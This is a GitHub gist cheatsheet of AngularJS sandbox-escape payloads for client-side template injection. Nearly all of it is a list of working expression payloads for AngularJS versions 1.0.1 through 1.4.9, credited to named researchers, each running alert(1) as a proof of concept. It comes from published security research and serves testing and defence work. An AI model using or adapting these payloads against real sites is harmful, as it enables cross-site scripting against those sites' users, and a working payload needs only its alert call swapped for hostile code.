Skip to content

Instantly share code, notes, and snippets.

@jeremybuis
Created January 27, 2016 15:31
Show Gist options
  • Save jeremybuis/38c01acae19fc2ac6959 to your computer and use it in GitHub Desktop.
Save jeremybuis/38c01acae19fc2ac6959 to your computer and use it in GitHub Desktop.
Angular Sandbox Escape Cheatsheet

#Angular Sandbox Escapes Cheatsheet

Source: XSS without HTML: Client-Side Template Injection with AngularJS

1.0.1 - 1.1.5 Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1 Jan Horn (Cure53)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5 Gareth Heyes (PortSwigger)

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

1.2.19 - 1.2.23 Mathias Karlsson

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.19 - 1.2.23 Mathias Karlsson

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29 Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

1.3.0 Gábor Molnár (Google)

{{!ready && (ready = true) && (
  !call
  ? $$watchers[0].get(toString.constructor.prototype)
  : (a = apply) &&
    (apply = constructor) &&
    (valueOf = call) &&
    (''+''.toString(
      'F = Function.prototype;' +
      'F.apply = F.a;' +
      'delete F.a;' +
      'delete F.valueOf;' +
      'alert(1);'
    ))
);}}

1.3.1 - 1.3.2 Gareth Heyes (PortSwigger)

{{
    {}[{toString:[].join,length:    1,0:'__proto__'}].assign=[].join;
    'a'.constructor.prototype.charAt=''.valueOf; 
    $eval('x=alert(1)//'); 
}}

1.3.3 - 1.3.18 Gareth Heyes (PortSwigger)

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
  'a'.constructor.prototype.charAt=[].join;
  $eval('x=alert(1)//');  }}

1.3.19 Gareth Heyes (PortSwigger)

{{
    'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; 
    $eval('x=alert(1)//'); 
}}

1.3.20 Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9 Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

Thanks goes to Gareth Heyes for compiling this list

@arez123
Copy link

arez123 commented Mar 8, 2021

xxx

@JFOZ1010
Copy link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment